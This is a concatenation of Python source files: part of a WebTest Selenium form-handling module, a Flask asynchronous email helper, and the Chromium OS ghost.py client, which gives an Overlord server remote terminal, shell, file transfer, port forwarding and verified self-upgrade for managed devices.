super(Field, self).__init__(*args, **kwargs)
self.browser = self.form.browser
self.options = []
self.selectedIndices = []
self._forced_values = []
self.locator = _eval_xpath(self.tag,
locator=self.form.locator,
name=self.name)
value = property(Element.value__get, Element.value__set)
class Select(Field):
"""Field representing ``<select>``"""
def force_value(self, value):
self.select('value=%s' % value)
def value__set(self, value):
self.select('value=%s' % value)
def value__get(self):
return self.getSelectedValue()
value = property(value__get, value__set)
Field.classes['select'] = Select
class MultipleSelect(Field):
"""Field representing ``<select multiple="multiple">``"""
def force_value(self, values):
self.removeAllSelections()
str_values = [testapp._stringify(value) for value in values]
for v in str_values:
self.addSelection('value=%s' % v)
def value__set(self, values):
self.removeAllSelections()
str_values = [testapp._stringify(value) for value in values]
for v in str_values:
self.addSelection('value=%s' % v)
def value__get(self):
value = self.getSelectedValues()
return value.split(',')
value = property(value__get, value__set)
Field.classes['multiple_select'] = MultipleSelect
class Radio(Field):
"""Field representing ``<input type="radio">``"""
def value__set(self, value):
if value:
self.check()
else:
self.uncheck()
def value__get(self):
script = r"""(function(obj) {
var name = '%s';
var element = obj.browserbot.findElement('%s');
var elements = element.getElementsByTagName('input');
var values = [];
for (var i = 0, n = elements.length; i < n; ++i) {
element = elements[i];
if (element.name == name && element.checked) {
values.push('name='+element.value);
}
}
return values.join('&');
}(this))""" % (self.name, self.form.locator)
value = self.browser.getEval(script)
value = [v for k, v in cgi.parse_qsl('name=true')]
if not value:
return None
elif len(value) == 1:
return value[0]
raise ValueError(
'Got more than one value for %r: %s' % (self, value))
value = property(value__get, value__set)
Field.classes['radio'] = Radio
class Checkbox(Radio):
"""Field representing ``<input type="checkbox">``"""
Field.classes['checkbox'] = Checkbox
class Text(Field):
"""Field representing ``<input type="text">``"""
Field.classes['text'] = Text
class File(Field):
"""Field representing ``<input type="file">``"""
def _run_server(self, filename):
"""Run a simple server in a separate thread"""
ip, port = _free_port()
def run():
FileHandler.filename = filename
server = HTTPServer((ip, port), FileHandler)
server.handle_request()
thread = threading.Thread(target=run)
thread.start()
return 'http://%s:%s/' % (ip, port)
def value__set(self, value):
if isinstance(value, (list, tuple)) and len(value) == 1:
value = [self.name] + list(value)
test_app = self.form.resp.test_app
file_info = test_app._get_file_info(value)
name, filename, content = file_info
if test_app.has_upload_support:
url = self._run_server(filename)
url += os.path.basename(filename)
self.attachFile(url)
force_value = value__set
value = property(Field.value__get, value__set)
Field.classes['file'] = File
class Textarea(Text):
"""Field representing ``<textarea>``"""
Field.classes['textarea'] = Textarea
class Hidden(Text, testapp.Hidden):
"""Field representing ``<input type="hidden">``"""
Field.classes['hidden'] = Hidden
class Submit(Field, testapp.Submit):
"""Field representing ``<input type="submit">`` and ``<button>``"""
settable = False
def value__get(self):
return None
value = property(value__get)
def value_if_submitted(self):
return self._value
Field.classes['submit'] = Submit
Field.classes['button'] = Submit
Field.classes['image'] = Submit
class Forms(object):
def __init__(self, resp):
self.resp = resp
def __getitem__(self, key):
return Form(self.resp, key)
class Form(testapp.Form, Element):
"""See :class:`~webtest.Form`"""
FieldClass = Field
def __init__(self, resp, id):
self.resp = resp
self.test_app = resp.test_app
self.browser = resp.browser
if isinstance(id, int):
self.locator = _eval_xpath('form', index=id)
else:
self.locator = _eval_xpath('form', id=id)
if not self:
raise LookupError('No form found at %s' % self.locator)
form = self.eval('e.innerHTML')
super(Form, self).__init__(resp, '<form>%s</form>' % form)
def _parse_fields(self):
super(Form, self)._parse_fields()
# Add index to locators
for name, fields in self.fields.items():
if len(fields) > 1:
for i, field in enumerate(fields):
field.locator += '[%s]' % (i + 1,)
def submit(self, name=None, index=None, extra_environ=None, timeout=None):
"""Submits the form. If ``name`` is given, then also select that
button (using ``index`` to disambiguate)``.
Returns a :class:`webtest.browser.TestResponse` object.
"""
if timeout != 0:
self.browser.captureNetworkTraffic('json')
self.test_app._make_environ(extra_environ)
if name:
selector = _eval_xpath('input', locator=self.locator,
name=name, index=index)
self.browser.click(selector)
else:
self.browser.submit(self.locator)
return self.test_app._get_response(resp=self.resp, timeout=timeout)
###############
# Servers
###############
class WSGIApplication(object):
"""A WSGI middleware to handle special calls used to run a test app"""
def __init__(self, app, bind):
self.app = app
self.serve_forever = True
self.bind = bind
self.url = 'http://%s:%s/' % bind
self.thread = None
def __call__(self, environ, start_response):
if '__kill_application__' in environ['PATH_INFO']:
self.serve_forever = False
resp = webob.Response()
return resp(environ, start_response)
elif '__file__' in environ['PATH_INFO']:
req = webob.Request(environ)
resp = webob.Response()
resp.content_type = 'text/html; charset=UTF-8'
filename = req.params.get('__file__')
body = open(filename).read()
body.replace('http://localhost/',
'http://%s/' % req.host)
if PY3:
resp.text = body
else:
resp.body = body
return resp(environ, start_response)
elif '__application__' in environ['PATH_INFO']:
resp = webob.Response()
return resp(environ, start_response)
return self.app(environ, start_response)
def __repr__(self):
return '<WSGIApplication %r at %s>' % (self.app, self.url)
class WSGIRequestHandler(simple_server.WSGIRequestHandler):
"""A WSGIRequestHandler who log to a logger"""
def log_message(self, format, *args):
log.debug("%s - - [%s] %s" %
(self.address_string(),
self.log_date_time_string(),
format % args))
class WSGIServer(simple_server.WSGIServer):
"""A WSGIServer"""
def serve_forever(self):
while self.application.serve_forever:
self.handle_request()
class FileHandler(SimpleHTTPRequestHandler):
"""Handle a simple file"""
def translate_path(self, path):
return self.filename
def log_message(self, format, *args):
log.debug("%s - - [%s] %s\n" %
(self.address_string(),
self.log_date_time_string(),
format % args))
###############
# Misc
###############
def _get_value(s):
if json:
return json.dumps(s)
else:
return repr(str(s))
def _get_command(cmd):
if '_' in cmd:
cmd = cmd.split('_')
cmd = [cmd.pop(0)] + [c.title() for c in cmd]
cmd = ''.join(cmd)
return cmd
def _eval_xpath(tag, locator=None, index=None, **kwargs):
if not locator:
locator = 'xpath='
locator += "//%s" % tag
for k, v in kwargs.items():
if k in ('for_', 'class_'):
k = k.strip('_')
if v:
if k == 'description':
locator += '[.="%s"]' % v
else:
locator += '[@%s="%s"]' % (k, v)
if index is not None:
locator += '[%s]' % (index + 1,)
return locator
def _free_port():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('', 0))
ip, port = s.getsockname()
s.close()
ip = os.environ.get('SELENIUM_BIND', '127.0.0.1')
return ip, port
def is_available():
"""return True if the selenium module is available and a RC server is
running"""
if json == False:
warnings.warn(
('selenium is not available because no json module are '
'available. Consider installing simplejson'),
SeleniumWarning)
host = os.environ.get('SELENIUM_HOST', '127.0.0.1')
port = int(os.environ.get('SELENIUM_PORT', 4444))
try:
conn = HTTPConnection(host, port)
conn.request('GET', '/')
except socket.error:
if 'SELENIUM_JAR' not in os.environ:
return False
else:
jar = os.environ['SELENIUM_JAR']
p = subprocess.Popen(['java', '-jar', jar])
os.environ['SELENIUM_PID'] = str(p.pid)
for i in range(30):
time.sleep(.3)
try:
conn = HTTPConnection(host, port)
conn.request('GET', '/')
except socket.error:
pass
else:
return True
return False
return True
|
email.py | from threading import Thread
from flask import current_app, render_template
from flask_mail import Message
from . import mail
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(to, subject, template, **kwargs):
app = current_app._get_current_object()
msg = Message(subject=app.config['FLASKY_MAIL_SUBJECT_PREFIX'] + ' ' + subject,
sender=app.config['FLASKY_MAIL_SENDER'],
recipients=[to])
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr |
ghost.py | #!/usr/bin/env python
# Copyright 2015 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from __future__ import print_function
import argparse
import contextlib
import ctypes
import ctypes.util
import fcntl
import hashlib
import json
import logging
import os
import platform
import Queue
import re
import select
import signal
import socket
import ssl
import struct
import subprocess
import sys
import termios
import threading
import time
import traceback
import tty
import urllib2
import uuid
import jsonrpclib
from jsonrpclib.SimpleJSONRPCServer import SimpleJSONRPCServer
_GHOST_RPC_PORT = int(os.getenv('GHOST_RPC_PORT', 4499))
_OVERLORD_PORT = int(os.getenv('OVERLORD_PORT', 4455))
_OVERLORD_LAN_DISCOVERY_PORT = int(os.getenv('OVERLORD_LD_PORT', 4456))
_OVERLORD_HTTP_PORT = int(os.getenv('OVERLORD_HTTP_PORT', 9000))
_BUFSIZE = 8192
_RETRY_INTERVAL = 2
_SEPARATOR = '\r\n'
_PING_TIMEOUT = 3
_PING_INTERVAL = 5
_REQUEST_TIMEOUT_SECS = 60
_SHELL = os.getenv('SHELL', '/bin/bash')
_DEFAULT_BIND_ADDRESS = 'localhost'
_CONTROL_START = 128
_CONTROL_END = 129
_BLOCK_SIZE = 4096
_CONNECT_TIMEOUT = 3
# Stream control
_STDIN_CLOSED = '##STDIN_CLOSED##'
SUCCESS = 'success'
FAILED = 'failed'
DISCONNECTED = 'disconnected'
class PingTimeoutError(Exception):
pass
class RequestError(Exception):
pass
class BufferedSocket(object):
"""A buffered socket that supports unrecv.
Allow putting back data back to the socket for the next recv() call.
"""
def __init__(self, sock):
self.sock = sock
self._buf = ''
def fileno(self):
return self.sock.fileno()
def Recv(self, bufsize, flags=0):
if self._buf:
if len(self._buf) >= bufsize:
ret = self._buf[:bufsize]
self._buf = self._buf[bufsize:]
return ret
else:
ret = self._buf
self._buf = ''
return ret + self.sock.recv(bufsize - len(ret), flags)
else:
return self.sock.recv(bufsize, flags)
def UnRecv(self, buf):
self._buf = buf + self._buf
def Send(self, *args, **kwargs):
return self.sock.send(*args, **kwargs)
def RecvBuf(self):
"""Only recive from buffer."""
ret = self._buf
self._buf = ''
return ret
def Close(self):
self.sock.close()
class TLSSettings(object):
def __init__(self, tls_cert_file, verify):
"""Constructor.
Args:
tls_cert_file: TLS certificate in PEM format.
enable_tls_without_verify: enable TLS but don't verify certificate.
"""
self._enabled = False
self._tls_cert_file = tls_cert_file
self._verify = verify
self._tls_context = None
def _UpdateContext(self):
if not self._enabled:
self._tls_context = None
return
self._tls_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
self._tls_context.verify_mode = ssl.CERT_REQUIRED
if self._verify:
if self._tls_cert_file:
self._tls_context.check_hostname = True
try:
self._tls_context.load_verify_locations(self._tls_cert_file)
logging.info('TLSSettings: using user-supplied ca-certificate')
except IOError as e:
logging.error('TLSSettings: %s: %s', self._tls_cert_file, e)
sys.exit(1)
else:
self._tls_context = ssl.create_default_context(ssl.Purpose.SERVER_AUTH)
logging.info('TLSSettings: using built-in ca-certificates')
else:
self._tls_context.verify_mode = ssl.CERT_NONE
logging.info('TLSSettings: skipping TLS verification!!!')
def SetEnabled(self, enabled):
logging.info('TLSSettings: enabled: %s', enabled)
if self._enabled != enabled:
self._enabled = enabled
self._UpdateContext()
def Enabled(self):
return self._enabled
def Context(self):
return self._tls_context
class Ghost(object):
"""Ghost implements the client protocol of Overlord.
Ghost provide terminal/shell/logcat functionality and manages the client
side connectivity.
"""
NONE, AGENT, TERMINAL, SHELL, LOGCAT, FILE, FORWARD = range(7)
MODE_NAME = {
NONE: 'NONE',
AGENT: 'Agent',
TERMINAL: 'Terminal',
SHELL: 'Shell',
LOGCAT: 'Logcat',
FILE: 'File',
FORWARD: 'Forward'
}
RANDOM_MID = '##random_mid##'
def __init__(self, overlord_addrs, tls_settings=None, mode=AGENT, mid=None,
sid=None, prop_file=None, terminal_sid=None, tty_device=None,
command=None, file_op=None, port=None, tls_mode=None):
"""Constructor.
Args:
overlord_addrs: a list of possible address of overlord.
tls_settings: a TLSSetting object.
mode: client mode, either AGENT, SHELL or LOGCAT
mid: a str to set for machine ID. If mid equals Ghost.RANDOM_MID, machine
id is randomly generated.
sid: session ID. If the connection is requested by overlord, sid should
be set to the corresponding session id assigned by overlord.
prop_file: properties file filename.
terminal_sid: the terminal session ID associate with this client. This is
use for file download.
tty_device: the terminal device to open, if tty_device is None, as pseudo
terminal will be opened instead.
command: the command to execute when we are in SHELL mode.
file_op: a tuple (action, filepath, perm). action is either 'download' or
'upload'. perm is the permission to set for the file.
port: port number to forward.
tls_mode: can be [True, False, None]. if not None, skip detection of
TLS and assume whether server use TLS or not.
"""
assert mode in [Ghost.AGENT, Ghost.TERMINAL, Ghost.SHELL, Ghost.FILE,
Ghost.FORWARD]
if mode == Ghost.SHELL:
assert command is not None
if mode == Ghost.FILE:
assert file_op is not None
self._platform = platform.system()
self._overlord_addrs = overlord_addrs
self._connected_addr = None
self._tls_settings = tls_settings
self._mid = mid
self._sock = None
self._mode = mode
self._machine_id = self.GetMachineID()
self._session_id = sid if sid is not None else str(uuid.uuid4())
self._terminal_session_id = terminal_sid
self._ttyname_to_sid = {}
self._terminal_sid_to_pid = {}
self._prop_file = prop_file
self._properties = {}
self._register_status = DISCONNECTED
self._reset = threading.Event()
self._tls_mode = tls_mode
# RPC
self._requests = {}
self._queue = Queue.Queue()
# Protocol specific
self._last_ping = 0
self._tty_device = tty_device
self._shell_command = command
self._file_op = file_op
self._download_queue = Queue.Queue()
self._port = port
def SetIgnoreChild(self, status):
# Only ignore child for Agent since only it could spawn child Ghost.
if self._mode == Ghost.AGENT:
signal.signal(signal.SIGCHLD,
signal.SIG_IGN if status else signal.SIG_DFL)
def GetFileSha1(self, filename):
with open(filename, 'r') as f:
return hashlib.sha1(f.read()).hexdigest()
def TLSEnabled(self, host, port):
"""Determine if TLS is enabled on given server address."""
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
# Allow any certificate since we only want to check if server talks TLS.
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
context.verify_mode = ssl.CERT_NONE
sock = context.wrap_socket(sock, server_hostname=host)
sock.settimeout(_CONNECT_TIMEOUT)
sock.connect((host, port))
return True
except ssl.SSLError:
return False
except socket.error: # Connect refused or timeout
raise
except Exception:
return False # For whatever reason above failed, assume False
def Upgrade(self):
logging.info('Upgrade: initiating upgrade sequence...')
try:
https_enabled = self.TLSEnabled(self._connected_addr[0],
_OVERLORD_HTTP_PORT)
except socket.error:
logging.error('Upgrade: failed to connect to Overlord HTTP server, '
'abort')
return
if self._tls_settings.Enabled() and not https_enabled:
logging.error('Upgrade: TLS enforced but found Overlord HTTP server '
'without TLS enabled! Possible mis-configuration or '
'DNS/IP spoofing detected, abort')
return
scriptpath = os.path.abspath(sys.argv[0])
url = 'http%s://%s:%d/upgrade/ghost.py' % (
's' if https_enabled else '', self._connected_addr[0],
_OVERLORD_HTTP_PORT)
# Download sha1sum for ghost.py for verification
try:
with contextlib.closing(
urllib2.urlopen(url + '.sha1', timeout=_CONNECT_TIMEOUT,
context=self._tls_settings.Context())) as f:
if f.getcode() != 200:
raise RuntimeError('HTTP status %d' % f.getcode())
sha1sum = f.read().strip()
except (ssl.SSLError, ssl.CertificateError) as e:
logging.error('Upgrade: %s: %s', e.__class__.__name__, e)
return
except Exception:
logging.error('Upgrade: failed to download sha1sum file, abort')
return
if self.GetFileSha1(scriptpath) == sha1sum:
logging.info('Upgrade: ghost is already up-to-date, skipping upgrade')
return
# Download upgrade version of ghost.py
try:
with contextlib.closing(
urllib2.urlopen(url, timeout=_CONNECT_TIMEOUT,
context=self._tls_settings.Context())) as f:
if f.getcode() != 200:
raise RuntimeError('HTTP status %d' % f.getcode())
data = f.read()
except (ssl.SSLError, ssl.CertificateError) as e:
logging.error('Upgrade: %s: %s', e.__class__.__name__, e)
return
except Exception:
logging.error('Upgrade: failed to download upgrade, abort')
return
# Compare SHA1 sum
if hashlib.sha1(data).hexdigest() != sha1sum:
logging.error('Upgrade: sha1sum mismatch, abort')
return
try:
with open(scriptpath, 'w') as f:
f.write(data)
except Exception:
logging.error('Upgrade: failed to write upgrade onto disk, abort')
return
logging.info('Upgrade: restarting ghost...')
self.CloseSockets()
self.SetIgnoreChild(False)
os.execve(scriptpath, [scriptpath] + sys.argv[1:], os.environ)
def LoadProperties(self):
try:
if self._prop_file:
with open(self._prop_file, 'r') as f:
self._properties = json.loads(f.read())
except Exception as e:
logging.error('LoadProperties: ' + str(e))
def CloseSockets(self):
# Close sockets opened by parent process, since we don't use it anymore.
if self._platform == 'Linux':
for fd in os.listdir('/proc/self/fd/'):
try:
real_fd = os.readlink('/proc/self/fd/%s' % fd)
if real_fd.startswith('socket'):
os.close(int(fd))
except Exception:
pass
def SpawnGhost(self, mode, sid=None, terminal_sid=None, tty_device=None,
command=None, file_op=None, port=None):
"""Spawn a child ghost with specific mode.
Returns:
The spawned child process pid.
"""
# Restore the default signal handler, so our child won't have problems.
self.SetIgnoreChild(False)
pid = os.fork()
if pid == 0:
self.CloseSockets()
g = Ghost([self._connected_addr], tls_settings=self._tls_settings,
mode=mode, mid=Ghost.RANDOM_MID, sid=sid,
terminal_sid=terminal_sid, tty_device=tty_device,
command=command, file_op=file_op, port=port)
g.Start()
sys.exit(0)
else:
self.SetIgnoreChild(True)
return pid
def Timestamp(self):
return int(time.time())
def GetGateWayIP(self):
if self._platform == 'Darwin':
output = subprocess.check_output(['route', '-n', 'get', 'default'])
ret = re.search('gateway: (.*)', output)
if ret:
return [ret.group(1)]
elif self._platform == 'Linux':
with open('/proc/net/route', 'r') as f:
lines = f.readlines()
ips = []
for line in lines:
parts = line.split('\t')
if parts[2] == '00000000':
continue
try:
h = parts[2].decode('hex')
ips.append('%d.%d.%d.%d' % tuple(ord(x) for x in reversed(h)))
except TypeError:
pass
return ips
else:
logging.warning('GetGateWayIP: unsupported platform')
return []
def GetFactoryServerIP(self):
try:
import factory_common # pylint: disable=unused-variable
from cros.factory.test import server_proxy
url = server_proxy.GetServerURL()
match = re.match(r'^https?://(.*):.*$', url)
if match:
return [match.group(1)]
except Exception:
pass
return []
def GetMachineID(self):
"""Generates machine-dependent ID string for a machine.
There are many ways to generate a machine ID:
Linux:
1. factory device_id
2. /sys/class/dmi/id/product_uuid (only available on intel machines)
3. MAC address
We follow the listed order to generate machine ID, and fallback to the
next alternative if the previous doesn't work.
Darwin:
All Darwin system should have the IOPlatformSerialNumber attribute.
"""
if self._mid == Ghost.RANDOM_MID:
return str(uuid.uuid4())
elif self._mid:
return self._mid
# Darwin
if self._platform == 'Darwin':
output = subprocess.check_output(['ioreg', '-rd1', '-c',
'IOPlatformExpertDevice'])
ret = re.search('"IOPlatformSerialNumber" = "(.*)"', output)
if ret:
return ret.group(1)
# Try factory device id
try:
import factory_common # pylint: disable=unused-variable
from cros.factory.test import testlog_goofy
return testlog_goofy.GetDeviceID()
except Exception:
pass
# Try DMI product UUID
try:
with open('/sys/class/dmi/id/product_uuid', 'r') as f:
return f.read().strip()
except Exception:
pass
# Use MAC address if non is available
try:
macs = []
ifaces = sorted(os.listdir('/sys/class/net'))
for iface in ifaces:
if iface == 'lo':
continue
with open('/sys/class/net/%s/address' % iface, 'r') as f:
macs.append(f.read().strip())
return ';'.join(macs)
except Exception:
pass
raise RuntimeError("can't generate machine ID")
def GetProcessWorkingDirectory(self, pid):
if self._platform == 'Linux':
return os.readlink('/proc/%d/cwd' % pid)
elif self._platform == 'Darwin':
PROC_PIDVNODEPATHINFO = 9
proc_vnodepathinfo_size = 2352
vid_path_offset = 152
proc = ctypes.cdll.LoadLibrary(ctypes.util.find_library('libproc'))
buf = ctypes.create_string_buffer('\0' * proc_vnodepathinfo_size)
proc.proc_pidinfo(pid, PROC_PIDVNODEPATHINFO, 0,
ctypes.byref(buf), proc_vnodepathinfo_size)
buf = buf.raw[vid_path_offset:]
n = buf.index('\0')
return buf[:n]
else:
raise RuntimeError('GetProcessWorkingDirectory: unsupported platform')
def Reset(self):
"""Reset state and clear request handlers."""
if self._sock is not None:
self._sock.Close()
self._sock = None
self._reset.clear()
self._last_ping = 0
self._requests = {}
self.LoadProperties()
self._register_status = DISCONNECTED
def SendMessage(self, msg):
"""Serialize the message and send it through the socket."""
self._sock.Send(json.dumps(msg) + _SEPARATOR)
def SendRequest(self, name, args, handler=None,
timeout=_REQUEST_TIMEOUT_SECS):
if handler and not callable(handler):
raise RequestError('Invalid request handler for msg "%s"' % name)
rid = str(uuid.uuid4())
msg = {'rid': rid, 'timeout': timeout, 'name': name, 'params': args}
if timeout >= 0:
self._requests[rid] = [self.Timestamp(), timeout, handler]
self.SendMessage(msg)
def SendResponse(self, omsg, status, params=None):
msg = {'rid': omsg['rid'], 'response': status, 'params': params}
self.SendMessage(msg)
def HandleTTYControl(self, fd, control_str):
msg = json.loads(control_str)
command = msg['command']
params = msg['params']
if command == 'resize':
# some error happened on websocket
if len(params) != 2:
return
winsize = struct.pack('HHHH', params[0], params[1], 0, 0)
fcntl.ioctl(fd, termios.TIOCSWINSZ, winsize)
else:
logging.warn('Invalid request command "%s"', command)
def SpawnTTYServer(self, unused_var):
"""Spawn a TTY server and forward I/O to the TCP socket."""
logging.info('SpawnTTYServer: started')
try:
if self._tty_device is None:
pid, fd = os.forkpty()
if pid == 0:
ttyname = os.ttyname(sys.stdout.fileno())
try:
server = GhostRPCServer()
server.RegisterTTY(self._session_id, ttyname)
server.RegisterSession(self._session_id, os.getpid())
except Exception:
# If ghost is launched without RPC server, the call will fail but we
# can ignore it.
pass
# The directory that contains the current running ghost script
script_dir = os.path.dirname(os.path.abspath(sys.argv[0]))
env = os.environ.copy()
env['USER'] = os.getenv('USER', 'root')
env['HOME'] = os.getenv('HOME', '/root')
env['PATH'] = os.getenv('PATH') + ':%s' % script_dir
os.chdir(env['HOME'])
os.execve(_SHELL, [_SHELL], env)
else:
fd = os.open(self._tty_device, os.O_RDWR)
tty.setraw(fd)
attr = termios.tcgetattr(fd)
attr[0] &= ~(termios.IXON | termios.IXOFF)
attr[2] |= termios.CLOCAL
attr[2] &= ~termios.CRTSCTS
attr[4] = termios.B115200
attr[5] = termios.B115200
termios.tcsetattr(fd, termios.TCSANOW, attr)
nonlocals = {'control_state': None, 'control_str': ''}
def _ProcessBuffer(buf):
write_buffer = ''
while buf:
if nonlocals['control_state']:
if chr(_CONTROL_END) in buf:
index = buf.index(chr(_CONTROL_END))
nonlocals['control_str'] += buf[:index]
self.HandleTTYControl(fd, nonlocals['control_str'])
nonlocals['control_state'] = None
nonlocals['control_str'] = ''
buf = buf[index+1:]
else:
nonlocals['control_str'] += buf
buf = ''
else:
if chr(_CONTROL_START) in buf:
nonlocals['control_state'] = _CONTROL_START
index = buf.index(chr(_CONTROL_START))
write_buffer += buf[:index]
buf = buf[index+1:]
else:
write_buffer += buf
buf = ''
if write_buffer:
os.write(fd, write_buffer)
_ProcessBuffer(self._sock.RecvBuf())
while True:
rd, unused_wd, unused_xd = select.select([self._sock, fd], [], [])
if fd in rd:
self._sock.Send(os.read(fd, _BUFSIZE))
if self._sock in rd:
buf = self._sock.Recv(_BUFSIZE)
if not buf:
raise RuntimeError('connection terminated')
_ProcessBuffer(buf)
except Exception as e:
logging.error('SpawnTTYServer: %s', e)
finally:
self._sock.Close()
logging.info('SpawnTTYServer: terminated')
sys.exit(0)
def SpawnShellServer(self, unused_var):
"""Spawn a shell server and forward input/output from/to the TCP socket."""
logging.info('SpawnShellServer: started')
# Add ghost executable to PATH
script_dir = os.path.dirname(os.path.abspath(sys.argv[0]))
env = os.environ.copy()
env['PATH'] = '%s:%s' % (script_dir, os.getenv('PATH'))
# Execute shell command from HOME directory
os.chdir(os.getenv('HOME', '/tmp'))
p = subprocess.Popen(self._shell_command, stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
shell=True, env=env)
def make_non_block(fd):
fl = fcntl.fcntl(fd, fcntl.F_GETFL)
fcntl.fcntl(fd, fcntl.F_SETFL, fl | os.O_NONBLOCK)
make_non_block(p.stdout)
make_non_block(p.stderr)
try:
p.stdin.write(self._sock.RecvBuf())
while True:
rd, unused_wd, unused_xd = select.select(
[p.stdout, p.stderr, self._sock], [], [])
if p.stdout in rd:
self._sock.Send(p.stdout.read(_BUFSIZE))
if p.stderr in rd:
self._sock.Send(p.stderr.read(_BUFSIZE))
if self._sock in rd:
ret = self._sock.Recv(_BUFSIZE)
if not ret:
raise RuntimeError('connection terminated')
try:
idx = ret.index(_STDIN_CLOSED * 2)
p.stdin.write(ret[:idx])
p.stdin.close()
except ValueError:
p.stdin.write(ret)
p.poll()
if p.returncode != None:
break
except Exception as e:
logging.error('SpawnShellServer: %s', e)
finally:
# Check if the process is terminated. If not, Send SIGTERM to process,
# then wait for 1 second. Send another SIGKILL to make sure the process is
# terminated.
p.poll()
if p.returncode is None:
try:
p.terminate()
time.sleep(1)
p.kill()
except Exception:
pass
p.wait()
self._sock.Close()
logging.info('SpawnShellServer: terminated')
sys.exit(0)
def InitiateFileOperation(self, unused_var):
if self._file_op[0] == 'download':
try:
size = os.stat(self._file_op[1]).st_size
except OSError as e:
logging.error('InitiateFileOperation: download: %s', e)
sys.exit(1)
self.SendRequest('request_to_download',
{'terminal_sid': self._terminal_session_id,
'filename': os.path.basename(self._file_op[1]),
'size': size})
elif self._file_op[0] == 'upload':
self.SendRequest('clear_to_upload', {}, timeout=-1)
self.StartUploadServer()
else:
logging.error('InitiateFileOperation: unknown file operation, ignored')
def StartDownloadServer(self):
logging.info('StartDownloadServer: started')
try:
with open(self._file_op[1], 'rb') as f:
while True:
data = f.read(_BLOCK_SIZE)
if not data:
break
self._sock.Send(data)
except Exception as e:
logging.error('StartDownloadServer: %s', e)
finally:
self._sock.Close()
logging.info('StartDownloadServer: terminated')
sys.exit(0)
def StartUploadServer(self):
logging.info('StartUploadServer: started')
try:
filepath = self._file_op[1]
dirname = os.path.dirname(filepath)
if not os.path.exists(dirname):
try:
os.makedirs(dirname)
except Exception:
pass
with open(filepath, 'wb') as f:
if self._file_op[2]:
os.fchmod(f.fileno(), self._file_op[2])
f.write(self._sock.RecvBuf())
while True:
rd, unused_wd, unused_xd = select.select([self._sock], [], [])
if self._sock in rd:
buf = self._sock.Recv(_BLOCK_SIZE)
if not buf:
break
f.write(buf)
except socket.error as e:
logging.error('StartUploadServer: socket error: %s', e)
except Exception as e:
logging.error('StartUploadServer: %s', e)
finally:
self._sock.Close()
logging.info('StartUploadServer: terminated')
sys.exit(0)
def SpawnPortForwardServer(self, unused_var):
"""Spawn a port forwarding server and forward I/O to the TCP socket."""
logging.info('SpawnPortForwardServer: started')
src_sock = None
try:
src_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
src_sock.settimeout(_CONNECT_TIMEOUT)
src_sock.connect(('localhost', self._port))
src_sock.send(self._sock.RecvBuf())
while True:
rd, unused_wd, unused_xd = select.select([self._sock, src_sock], [], [])
if self._sock in rd:
data = self._sock.Recv(_BUFSIZE)
if not data:
raise RuntimeError('connection terminated')
src_sock.send(data)
if src_sock in rd:
data = src_sock.recv(_BUFSIZE)
if not data:
break
self._sock.Send(data)
except Exception as e:
logging.error('SpawnPortForwardServer: %s', e)
finally:
if src_sock:
src_sock.close()
self._sock.Close()
logging.info('SpawnPortForwardServer: terminated')
sys.exit(0)
def Ping(self):
def timeout_handler(x):
if x is None:
raise PingTimeoutError
self._last_ping = self.Timestamp()
self.SendRequest('ping', {}, timeout_handler, 5)
def HandleFileDownloadRequest(self, msg):
params = msg['params']
filepath = params['filename']
if not os.path.isabs(filepath):
filepath = os.path.join(os.getenv('HOME', '/tmp'), filepath)
try:
with open(filepath, 'r') as _:
pass
except Exception as e:
return self.SendResponse(msg, str(e))
self.SpawnGhost(self.FILE, params['sid'],
file_op=('download', filepath))
self.SendResponse(msg, SUCCESS)
def HandleFileUploadRequest(self, msg):
params = msg['params']
# Resolve upload filepath
filename = params['filename']
dest_path = filename
# If dest is specified, use it first
dest_path = params.get('dest', '')
if dest_path:
if not os.path.isabs(dest_path):
dest_path = os.path.join(os.getenv('HOME', '/tmp'), dest_path)
if os.path.isdir(dest_path):
dest_path = os.path.join(dest_path, filename)
else:
target_dir = os.getenv('HOME', '/tmp')
# Terminal session ID found, upload to it's current working directory
if params.has_key('terminal_sid'):
pid = self._terminal_sid_to_pid.get(params['terminal_sid'], None)
if pid:
try:
target_dir = self.GetProcessWorkingDirectory(pid)
except Exception as e:
logging.error(e)
dest_path = os.path.join(target_dir, filename)
try:
os.makedirs(os.path.dirname(dest_path))
except Exception:
pass
try:
with open(dest_path, 'w') as _:
pass
except Exception as e:
return self.SendResponse(msg, str(e))
# If not check_only, spawn FILE mode ghost agent to handle upload
if not params.get('check_only', False):
self.SpawnGhost(self.FILE, params['sid'],
file_op=('upload', dest_path, params.get('perm', None)))
self.SendResponse(msg, SUCCESS)
def HandleRequest(self, msg):
command = msg['name']
params = msg['params']
if command == 'upgrade':
self.Upgrade()
elif command == 'terminal':
self.SpawnGhost(self.TERMINAL, params['sid'],
tty_device=params['tty_device'])
self.SendResponse(msg, SUCCESS)
elif command == 'shell':
self.SpawnGhost(self.SHELL, params['sid'], command=params['command'])
self.SendResponse(msg, SUCCESS)
elif command == 'file_download':
self.HandleFileDownloadRequest(msg)
elif command == 'clear_to_download':
self.StartDownloadServer()
elif command == 'file_upload':
self.HandleFileUploadRequest(msg)
elif command == 'forward':
self.SpawnGhost(self.FORWARD, params['sid'], port=params['port'])
self.SendResponse(msg, SUCCESS)
def HandleResponse(self, response):
rid = str(response['rid'])
if rid in self._requests:
handler = self._requests[rid][2]
del self._requests[rid]
if callable(handler):
handler(response)
else:
logging.warning('Received unsolicited response, ignored')
def ParseMessage(self, buf, single=True):
if single:
try:
index = buf.index(_SEPARATOR)
except ValueError:
self._sock.UnRecv(buf)
return
msgs_json = [buf[:index]]
self._sock.UnRecv(buf[index + 2:])
else:
msgs_json = buf.split(_SEPARATOR)
self._sock.UnRecv(msgs_json.pop())
for msg_json in msgs_json:
try:
msg = json.loads(msg_json)
except ValueError:
# Ignore mal-formed message.
logging.error('mal-formed JSON request, ignored')
continue
if 'name' in msg:
self.HandleRequest(msg)
